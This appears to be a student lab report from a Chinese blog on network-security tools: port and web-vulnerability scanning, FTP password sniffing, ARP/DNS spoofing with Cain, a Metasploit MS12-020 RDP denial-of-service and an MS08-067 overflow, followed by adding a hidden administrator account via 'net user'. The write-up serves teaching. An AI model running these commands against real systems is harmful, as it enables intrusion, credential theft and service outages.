NMap端口扫描

NMap是用来扫描网络上计算机开放的网络连接端口。

  1. Nmap GUI的使用

    Target中输入目标IP地址,扫描方式选择regular scan,点击scan,即可得到目标主机开放的端口。
  2. 命令行的使用
    进行上述GUI扫描的命令是:nmap IP
    对指定端口进行扫描的命令是:nmap -p portnumber IP
    对目标主机进行全连接扫描(稳定可靠但容易被日志记录)的命令是:nmap -sT IP
    对目标主机进行半开连接扫描(更隐蔽)的命令是:nmap -sS IP
    保存扫描结果的扫描命令是:nmap -oX filename IP
  3. 课后习题
    组合命令如:同时保存扫描结果并以半开连接方式扫描:nmap -sS -oX filename IP
    识别主机操作系统的命令是:nmap -O IP
    ---

    综合扫描X-Scan

    X-Scan采用多线程方式对指定IP地址段进行安全漏洞检测。

  4. 设置X-Scan参数
    在菜单栏设置->扫描参数中,有以下这些选项:
  • 扫描模块:包含服务和协议弱口令等信息的扫描
  • 并发扫描:对扫描的并发数量进行设置
  • 扫描报告:设定扫描完成后报告生成情况
  • 其他设置:对扫描进度的显示等
  • 端口设置:设置想要扫描的端口、检测方式等内容(本实验填21,即FTP
  1. 进行扫描
    设置完成后点击文件->开始扫描,自动生成报告,观察到已破解FTP弱口令:
    在浏览器中输入:ftp://192.168.1.3,输入以上用户名和口令,成功登陆:
    证明漏洞获取成功。
  2. 课后习题
  • 防火墙对扫描软件有屏蔽作用,因为它可以把扫描软件发出的数据包丢掉而不作出回应。
  • 服务攻击是让目标机器停止提供服务的攻击,不是针对某种特定网络的。

AWVS扫描器扫描web漏洞

AWVS可以扫描任何可通过Web浏览器访问的Web站点和Web应用程序,可通过SQL注入攻击、跨站脚本攻击等审核应用程序的安全性。

  1. 基本用法
    单击工具栏中的new scan,输入URL:192.168.1.3:8001,一直点击下一步直到Finish,扫描结果如下:
  2. 高级功能
    在上图左栏中选择tools中的site crawler,点击start,即可进行站点爬行。
    在上图左栏中选择tools中的target finder,可找出web服务器。
  3. 课后习题
    AWVS的其他功能如:选择tools中的http sniffer,可以实现抓包:
    经过http_sniffer捕捉到的数据包,可以直接send到http editor,使用http editor进行编辑和重放,如图:

AppScan扫描web漏洞

AppScan通过爬行发现整个web应用结构,发送修改的HTTP Request进行攻击,验证是否存在安全漏洞。

  1. 开启扫描
    选择文件->新建中的常规扫描,并选中启动扫描配置向导,URL填写192.168.1.3:8001,之后一直选是直到得到扫描结果:
    点击右上角的报告,生成PDF格式的报告。
  2. 课后习题
    分析扫描结果:以SQL注入攻击为例,它是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。该问题存在于该站点的see.asp网页的titleIDIDlist.asp网页的PhotoerKeyWordsexif.asp网页的idcontent.asp网页的ID2等变量中。
    appscan的功能是进行漏洞检查,而不是进行漏洞攻击。

御剑web后台敏感目录扫描

御剑扫描工具主要用来扫描目标站点的敏感目录。

  1. 基本使用
    在域名中输入192.168.1.3:8001,点击开始扫描,扫描结果如下:
  2. 扫描结果分析
    http响应为200说明该页面可访问。例如双击index.asp即可进入目标站点的主页,双击FCKeditor/_whatsnew.html可知道该站点的编辑器类型为FCK及其版本号。
  3. 课后习题
    敏感目录如后台管理页面、cms类型以及版本等,即包含站点关键信息的页面。
    可在login.asp页面看到网站数据库为asp+access

FTP连接与密码明文抓取-wireshark

Wireshark是一个网络封包分析软件,它撷取网络封包,并尽可能显示出最详细的有关资料。

  1. 抓包参数的设置
    Capture菜单中设置抓包的相关参数,如interfaces选项显示可操作性的网络适配器,options选项设置如抓包模式、过滤器等参数。点击start开始。
  2. 数据包的解析
  • 第一行为Wireshark添加的该帧的统计信息,包括捕获时间、编号、帧长度、协议等。
  • 第二行为链路层信息,包括目的MAC地址,源MAC地址,上层协议类型。
  • 第三行为网络层信息,此处为IP协议,包括版本、头部长度、总长度、标志位等。
  • 第四行为传输层信息,包括源/目的端口、序列号、期望的下一个序列号等。
  • 第五行为应用层,此处为FTP协议,显示的是响应内容。
  1. 建立连接
    设置完参数后点击start按钮开始抓包,在地址栏输入ftp:\192.168.1.3,输入默认账号和密码。
    在filter中输入ftp过滤出数据包,看到输入的账号和密码:
  2. 课后习题
    DNS依赖于UDP,FTP依赖于TCP
    由实验过程可知,访问FTP需要账户和密码。
    如何合理设置抓包规则:在captionoption中:
  • 抓取http报文:输入tcp port 80,因为大部分Web网站都是工作在80端口的
  • 抓取arp报文:输入ether proto 0x0806,这个字段的值表示是ARP报文
  • 只抓取与某主机的通信:输入host IP

利用arp协议缺陷实现中间人攻击及内网DNS欺骗

ARP协议是根据IP地址获取物理地址的一个TCP/IP协议,攻击者可以通过修改arp高速缓存来实现攻击。
DNS是将域名和IP互相映射的网络应用的基础设施。DNS攻击和ARP攻击原理相同,但是要事先知道DNS查询请求ID。
CAIN是一个实现各种中间人攻击的软件。

  1. 利用cain进行arp欺骗
    打开cain软件,在configure中选择网卡,再依次点击start->sniffer->hosts->scan mac address,扫描出本网段除本机以外的其他机器。只保留192.168.1.3192.168.1.4
    扫描出mac地址后,在arp选项中添加这两个地址。
    分别查看这两台主机的arp缓存:
    点击arp按钮实施poisoning:
    再去两个主机上查看arp缓存,发现mac地址被改变:

2.利用cain抓取ftp密码
192.168.1.3系统中,连接192.168.1.4搭建的ftp服务器,输入账户名和密码。
再切换到192.168.1.2系统中,选择cain下方的passwords选项,点击左侧ftp,可以看到有一条anonymous,说明ftp允许匿名登录。
3. 利用cain进行dns欺骗
首先解析正确的www.shiyanbar.com域名:nslookup -qt=A www.shiyanbar.com 192.168.1.4

切换到192.168.1.2中,点击arp,选择arp-dns,点击加号,将解析ip改为1.1.1.1
重新使用192.168.1.3查询域名IP:
4. 课后习题
如何防范arp中间人攻击:

  • 在主机绑定网关MAC与IP地址为静态(默认为动态),命令:arp -s IP MAC
  • 在网关绑定主机MAC与IP地址
  • 使用ARP防火墙

    msf利用远程桌面协议RDP拒绝访问漏洞

    RDP(远程桌面协议)是一个让客户端连上服务器的协议。windows在处理某些报文时存在错误,会造成服务停止响应。

1.攻击步骤
在linux终端输入nmap -sS -Pn -A 192.168.1.3扫描主机,发现端口3389打开。
输入msfconsole命令,再输入search ms12_020,查找远程桌面相关参数。

输入命令use auxiliary/dos/windows/rdp/ms12_020_maxchannelids来定义exploits参数。输入命令show options,查看需要配置的参数:

设置远程主机IP:set RHOST 192.168.1.3
输入命令exploit进行攻击。
目标主机蓝屏重启,说明攻击成功。

  1. 课后习题
    如何启动msf图像界面:输入命令msfgui

MS08067利用方法

利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode代码,打开目标主机端口,使用telnel链接目标端口,获得系统权限。

  1. 运行MS08067远程溢出软件
    在命令行中运行MS08067.exe:MS08067.exe 192.168.1.3
  2. 链接远程主机并添加用户
    输入命令telnet 192.168.1.3 4444连接目标主机。
    输入命令net user aaa 123456 /add在目标主机上添加账户。
    输入命令net localgroup administrators aaa /add,把aaa用户添加到管理组。
    输入命令net user aaa验证aaa是否添加成功。
    打开mstsc,输入账号和密码,成功登陆:
  3. 课后习题
    为什么telnet 4444端口:因为MS08067.exe进行缓冲区溢出的是4444端口。

分析讨论

本章实验实现的功能是:扫描(端口扫描、综合扫描、web漏洞扫描、后台敏感目录扫描)、网络封包分析、欺骗攻击(arp欺骗、DNS欺骗)、攻击(Dos攻击、远程溢出攻击)。
总结起来,最常见的网络上被利用的漏洞有:

  • Cookie中毒--身份伪装:通过处理存放在浏览器cookie中的信息,黑客伪装成合法的用户然后就可以存取用户的信息。许多Web应用程序使用客户机上的cookie来保存信息(用户身份、时间戳等等)。由于cookie通常都没有加密,黑客可以对它们进行修改,这样就可以通过这些"中了毒的cookie"来欺骗应用程序。心存恶意的用户可以访问他人的账户然后象真正用户那样行事。如1.7中的arp和dns欺骗。
  • 缓冲区溢出--业务终止:通过使用某种形式的数据流,用过量的信息使服务器超载,黑客常常能够使服务器崩溃从而关闭网站。如1.9节中的远程溢出攻击。
  • 篡改参数--欺诈:这种技术改变网站URL的参数。很多web应用程序无法确定嵌入在超链接中CGI参数的正确性。比如说,允许信用卡使用500,000元这样大额的限制,跳过网站的登陆界面以及允许对取消后的订单和客户信息进行访问。

转载于:https://www.cnblogs.com/yingtaomj/p/6789048.html

网络安全实验报告 第一章相关推荐

  1. 利用matlab的帮助功能分别查询inv,MATLAB实验报告第一章..doc

    贵州大学实验报告(小三号,加黑) 学院: 专业: 班级: 姓名张成思学号0908060322实验组实验时间2011.10.24指导教师周雪梅成绩实验项目名称实验一实验目的熟悉MATLAB的操作环境及基 ...

  2. mysql注入实验报告_网络安全实验报告 第二章

    利用TCP协议实现synflood攻击 运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态. 利用xdos工具进行攻击 首先在192.168.1.3的目标机器上打开wiresh ...

  3. 计算机网络网络安全实验报告,《计算机网络安全》实验报告

    <计算机网络安全>实验报告 (9页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦! 9.9 积分 <计算机网络安全>实验报告■实验名称 ...

  4. 计算机基础实验测试题第一章(悄悄变强秘籍)

    计算机基础实验测试题第一章 一.单项选择题(每题2分,共10题,共20分) 1(2分)关于微型计算机体系结构,下列说法正确的是() A.微处理器由运算器.控制器和存储器组成. B.微机的CPU.内存等 ...

  5. 计算机常见故障排除实验报告,会计信息系统实验报告(1-6章)实验重点问题的分析问题...

    会计信息系统实验报告(1-6章)实验重点问题的分析问题 一.系统管理和基础设置 1. 哪些操作员可以进入系统管理进行工作,在功能上有什么区别? 2.权限设置的"角色"功能有何作用? ...

  6. 计算机网络信息安全的实验报告,网络安全实验报告.doc

    网络安全实验报告 本科实验课程报告 (2016至2017学年第1学期) 课程名称: 网络信息安全 专业名称: 行政班级: 学 号: 姓 名: 指导教师: 赵学民 报告时间: 年 月 日 实验大纲 一. ...

  7. linux实验报告实验二,Linux实验报告 第二章

    linux实验报告 第二章 linux终端 1,概念 使用linux时并不是直接使用系统,而是通过shell这个中间程序来完成,为了实现在一个窗口中完成用户输入和现实输出,linux系统还有一个叫做终 ...

  8. c语言第六次实验报告,第一年C语言实验报告6列

    成都理工大学计算机工程学院"编程基础"实验报告 1. 实验目的 (1)精通一维数组. 二维数组的定义,初始化以及输入和输出方法(2)掌握字符数组和字符串函数的使用(3)掌握与数组有 ...

  9. php运算符实验报告,第二章,第三章实验报告(示例代码)

    C程序设计实验报告(第二次) 姓名:熊毅 实验地点:家 实验时间:2020.03.10 实验项目:字符与ASCII码:运算符与表达式的应用:顺序结构应用程序:数学函数:鸡兔同笼:确定坐标 一.实验目的 ...

最新文章

  1. poj2289二分图多重匹配
  2. 基于OpenCV的区域分割、轮廓检测和阈值处理
  3. php获取svn文件,然后ftp上传服务器代码
  4. Java 比较相等 == or .equal()?
  5. SQL Sever 基本命令案例
  6. nssl1230-序列【位运算】
  7. signature=b21ede5d7e667b061a2058d2d4aba643,【D2D8524B18023CCDD6DBEEF2AB467
  8. c语言语法sc,适合于嵌入式系统的C语言单元测试框架:SCUNIT
  9. 如何安装 chrome 开发版
  10. php date日期相关函数
  11. 与体育行业有关的e–r图_国家体育产业统计分类
  12. 【评测】种草群晖918却剁手铁威马F4-421,上手更简单性价比还高
  13. Linux+Ubuntu
  14. 敌兵布阵-HDU1166(线段树,树状数组)
  15. 通过网页版邮箱的实现“联系我们”
  16. android无法格式化sd卡,手机sd卡无法格式化怎么回事?手机sd卡无法格式化解决方法...
  17. laravel安装barryvdh/laravel-snappy 笔记
  18. CSV文件乱码问题解决
  19. 使用nodejs机器学习进行app流量判别
  20. TOMCAT 中间件安全加固

热门文章

  1. TensorFlow2.0 —— 模型保存与加载
  2. 模式识别听课笔记【武汉理工大学】
  3. 如何彻底清除UniAccess Agent
  4. json增加反斜杠 php_thinkphp5.1.x~5.2.x版本反序列化链挖掘分析
  5. 深度学习这么调参训练_深度学习训练的小技巧,调参经验(转)
  6. 群同态基本定理证明_有限群的线性表示 | 表示与群代数
  7. python3设置编码背景颜色_在pythongtk3中设置条目背景颜色并设置回defau的最佳方法...
  8. 解决方案架构师我需要懂代码吗_“请问需要加汤吗?”火锅店背后隐藏的商业暗示,你都看懂了吗?...
  9. windows2016+sqlserver2017集群搭建alwayson之域控篇
  10. ajax 传输中文乱码,关于Ajax请求中传输中文乱码问题的解决方案